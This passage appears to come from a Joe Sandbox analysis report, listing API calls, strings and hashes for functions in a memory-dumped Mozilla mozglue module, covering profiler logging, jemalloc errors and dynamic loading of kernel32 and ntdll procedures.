                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                      • String ID: CoInitializeEx$combase.dll
                                                                                                      • API String ID: 4190559335-2063391169
                                                                                                      • Opcode ID: 36a82da8c9dee69272e30c7178bb77a7e217547ff54a2306614539d9da3f9591
                                                                                                      • Instruction ID: 5c193eef70d5fe135901387cc17ba495690b0e8ed3339153463d1ee180855d7d
                                                                                                      • Opcode Fuzzy Hash: 36a82da8c9dee69272e30c7178bb77a7e217547ff54a2306614539d9da3f9591
                                                                                                      • Instruction Fuzzy Hash: 87118276509241DBEF008FD5DD09F5A7FBDFB8F325F004229EA2AA2781D770A406CA56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFDF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF559
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDF561
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF577
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDF585
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDF5A3
                                                                                                      Strings
                                                                                                      • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CFDF56A
                                                                                                      • [I %d/%d] profiler_resume_sampling, xrefs: 6CFDF499
                                                                                                      • [I %d/%d] profiler_pause_sampling, xrefs: 6CFDF3A8
                                                                                                      • [I %d/%d] profiler_resume, xrefs: 6CFDF239
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                      • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                      • API String ID: 2848912005-2840072211
                                                                                                      • Opcode ID: 8738a382eb2eb520d2eef01e81882235442638979f8cd9c311f6d3526c5c307d
                                                                                                      • Instruction ID: 59f23accf91a21f246cb9e4802caac83fa2dccd68832a51bf8fa9a9898b5971c
                                                                                                      • Opcode Fuzzy Hash: 8738a382eb2eb520d2eef01e81882235442638979f8cd9c311f6d3526c5c307d
                                                                                                      • Instruction Fuzzy Hash: ECF054765002149FEA006BE59C4AB6A7BBDFB8B29DF054015FA1583302DF7598058761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,6CFA0DF8), ref: 6CFA0E82
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CFA0EA1
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA0EB5
                                                                                                      • FreeLibrary.KERNEL32 ref: 6CFA0EC5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                      • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                      • API String ID: 391052410-1680159014
                                                                                                      • Opcode ID: 382b32ae8f542060ecf84cbec6e5bb8162e65a04be76e79a4f7995342012e8f6
                                                                                                      • Instruction ID: 455f23f18da9111e403b283edbebfa692c1b00d0e112d3cad8bf4c4a629932a9
                                                                                                      • Opcode Fuzzy Hash: 382b32ae8f542060ecf84cbec6e5bb8162e65a04be76e79a4f7995342012e8f6
                                                                                                      • Instruction Fuzzy Hash: 39016276600381DBEF00CFD8DD96B927BF9F747314F104225E92A82BA0D7B0E405DA02
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFDF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF619
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CFDF598), ref: 6CFDF621
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF637
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8,?,?,00000000,?,6CFDF598), ref: 6CFDF645
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8,?,?,00000000,?,6CFDF598), ref: 6CFDF663
                                                                                                      Strings
                                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CFDF62A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                      • API String ID: 2848912005-753366533
                                                                                                      • Opcode ID: 8bb261cc37a008364216d5c57a6f2f66f6d4e4c5b5bbc81048809da7bb045103
                                                                                                      • Instruction ID: c0f55ca1c045f22d7dc2ca884d0109fec25c3e1cefb68020b8dbddefa16b3a9e
                                                                                                      • Opcode Fuzzy Hash: 8bb261cc37a008364216d5c57a6f2f66f6d4e4c5b5bbc81048809da7bb045103
                                                                                                      • Instruction Fuzzy Hash: DCF05476100214AFEA006BE59C49B6A7BBDFB8B29DF054015FA1583742DF7558058761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CFCCFAE,?,?,?,6CF931A7), ref: 6CFD05FB
                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CFCCFAE,?,?,?,6CF931A7), ref: 6CFD0616
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CF931A7), ref: 6CFD061C
                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CF931A7), ref: 6CFD0627
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _writestrlen
                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                      • API String ID: 2723441310-2186867486
                                                                                                      • Opcode ID: caae92e14d69ea61b816726f524f9a8fc6fcbbc4604b40e0b4076793bd4d8b5e
                                                                                                      • Instruction ID: 8563cfb35f07223aaa69586e4858cf3c7d6931e133d8f19ef5a541c15ada1384
                                                                                                      • Opcode Fuzzy Hash: caae92e14d69ea61b816726f524f9a8fc6fcbbc4604b40e0b4076793bd4d8b5e
                                                                                                      • Instruction Fuzzy Hash: B4E08CE291505037F5146256AC86EBB761CCBC6134F090039FE0D83301EA4AAE1A51FA
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a6c51d028c2d9455143156a8f3dd1cbe592b44ec7834a7ed40eff4f77dcc4813
                                                                                                      • Instruction ID: c09caba89ecfceaf3df9f6e7e491747494f473404f1d8eb7ccadfc828b6bbeab
                                                                                                      • Opcode Fuzzy Hash: a6c51d028c2d9455143156a8f3dd1cbe592b44ec7834a7ed40eff4f77dcc4813
                                                                                                      • Instruction Fuzzy Hash: B6A147B1A00645CFDB14CF69D984B9AFBF1BF49304F44866ED45A97B00E770AA46CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFF14C5
                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CFF14E2
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFF1546
                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6CFF15BA
                                                                                                      • free.MOZGLUE(?), ref: 6CFF16B4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                      • String ID:
                                                                                                      • API String ID: 1909280232-0
                                                                                                      • Opcode ID: 17ced20d702d5a73165650bba4d7f4ae65e5875916215198ff2b0ccdf5021d58
                                                                                                      • Instruction ID: c043257ff8f105db7d8b97f5e88170c5869fd5e986a716b6a8611575e322fdd2
                                                                                                      • Opcode Fuzzy Hash: 17ced20d702d5a73165650bba4d7f4ae65e5875916215198ff2b0ccdf5021d58
                                                                                                      • Instruction Fuzzy Hash: F561EE729007149BDB128F21C880BDEBBB5FF89308F04851CED9A57711EB35E989CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFEDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFEDC60
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CFED38A,?), ref: 6CFEDC6F
                                                                                                      • free.MOZGLUE(?,?,?,?,?,6CFED38A,?), ref: 6CFEDCC1
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CFED38A,?), ref: 6CFEDCE9
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CFED38A,?), ref: 6CFEDD05
                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CFED38A,?), ref: 6CFEDD4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                      • String ID:
                                                                                                      • API String ID: 1842996449-0
                                                                                                      • Opcode ID: d08e266f2ada4ec8ec866e8175898da418e99fe2bed72667dc44aff8a4be8536
                                                                                                      • Instruction ID: 01cd6c5a378901255c2fb254ee546adb86f4ab398f016f220e5689f977ef4936
                                                                                                      • Opcode Fuzzy Hash: d08e266f2ada4ec8ec866e8175898da418e99fe2bed72667dc44aff8a4be8536
                                                                                                      • Instruction Fuzzy Hash: F7418DB5A00215DFCB00CFA9C880A9AB7F6FF8D314B554569D945ABB11E771FC00CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCFA80: GetCurrentThreadId.KERNEL32 ref: 6CFCFA8D
                                                                                                        • Part of subcall function 6CFCFA80: AcquireSRWLockExclusive.KERNEL32(6D01F448), ref: 6CFCFA99
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFD6727
                                                                                                      • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CFD67C8
                                                                                                        • Part of subcall function 6CFE4290: memcpy.VCRUNTIME140(?,?,6CFF2003,6CFF0AD9,?,6CFF0AD9,00000000,?,6CFF0AD9,?,00000004,?,6CFF1A62,?,6CFF2003,?), ref: 6CFE42C4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                      • String ID: data
                                                                                                      • API String ID: 511789754-2918445923
                                                                                                      • Opcode ID: bca62c479a44c3c43309fe57b67cab0c39fd47969246fdeca7bf7e67d3e8d7e0
                                                                                                      • Instruction ID: 3c2239f5066c1d8346d01b66818afa8362655bd16dd7735bf18a51ed56bfb89f
                                                                                                      • Opcode Fuzzy Hash: bca62c479a44c3c43309fe57b67cab0c39fd47969246fdeca7bf7e67d3e8d7e0
                                                                                                      • Instruction Fuzzy Hash: 98D1BC75A083409FE724CF64C840B9FBBE5AFD5308F15492DE589C7B91EB30A949CB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFCD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CF9EB57,?,?,?,?,?,?,?,?,?), ref: 6CFCD652
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CF9EB57,?), ref: 6CFCD660
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CF9EB57,?), ref: 6CFCD673
                                                                                                      • free.MOZGLUE(?), ref: 6CFCD888
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memsetmoz_xmalloc
                                                                                                      • String ID: |Enabled
                                                                                                      • API String ID: 4142949111-2633303760
                                                                                                      • Opcode ID: a82e0c0204e8a95a9d584b9abc9b5e3c0915bc91ccf44d9aba1f720e1d2f4e94
                                                                                                      • Instruction ID: 38319c33da2bba1cb3b0495d587cce95485c2885dc5d94dcd9d7d38c1f4e48ae
                                                                                                      • Opcode Fuzzy Hash: a82e0c0204e8a95a9d584b9abc9b5e3c0915bc91ccf44d9aba1f720e1d2f4e94
                                                                                                      • Instruction Fuzzy Hash: 6DA1D170B042069FDB15CF69C8D07AFBBF1AF49318F14805CD899AB781D735A845CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFCF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CFCF480
                                                                                                        • Part of subcall function 6CF9F100: LoadLibraryW.KERNEL32(shell32,?,6D00D020), ref: 6CF9F122
                                                                                                        • Part of subcall function 6CF9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CF9F132
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 6CFCF555
                                                                                                        • Part of subcall function 6CFA14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CFA1248,6CFA1248,?), ref: 6CFA14C9
                                                                                                        • Part of subcall function 6CFA14B0: memcpy.VCRUNTIME140(?,6CFA1248,00000000,?,6CFA1248,?), ref: 6CFA14EF
                                                                                                        • Part of subcall function 6CF9EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CF9EEE3
                                                                                                      • CreateFileW.KERNEL32 ref: 6CFCF4FD
                                                                                                      • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CFCF523
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                      • String ID: \oleacc.dll
                                                                                                      • API String ID: 2595878907-3839883404
                                                                                                      • Opcode ID: 9f4e6bf4c9c3c43ce0256f7d8f1bf8da152bf00e25c0c9b8026a7e9525eb7f86
                                                                                                      • Instruction ID: 5b0dd44481bc964c2edda9f6627ccf5985ae4439f0957d3424bda5599107dd70
                                                                                                      • Opcode Fuzzy Hash: 9f4e6bf4c9c3c43ce0256f7d8f1bf8da152bf00e25c0c9b8026a7e9525eb7f86
                                                                                                      • Instruction Fuzzy Hash: 4B418B707087119FE760DF68C884B9BF7F4AF85318F104A18F6A483650EB30DA498B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32(00000000), ref: 6CFF7526
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFF7566
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFF7597
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footer$ErrorLast
                                                                                                      • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                      • API String ID: 3217676052-1401603581
                                                                                                      • Opcode ID: f943982c075a6c13edacbff1f68ba3d5c033880a7fc91850d7efc57d5f77fa2a
                                                                                                      • Instruction ID: 54d41f5f2cf6d2d15d966c945c4829c2e8744ed5d1fb87bf2e6451a1d850635e
                                                                                                      • Opcode Fuzzy Hash: f943982c075a6c13edacbff1f68ba3d5c033880a7fc91850d7efc57d5f77fa2a
                                                                                                      • Instruction Fuzzy Hash: 9221F536705501E7DB15CFE9CC55F5A77BAEB86324F14022EE42997B90C720F8038656
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFFC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,6CFFC0E9), ref: 6CFFC418
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CFFC437
                                                                                                      • FreeLibrary.KERNEL32(?,6CFFC0E9), ref: 6CFFC44C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                      • API String ID: 145871493-2623246514
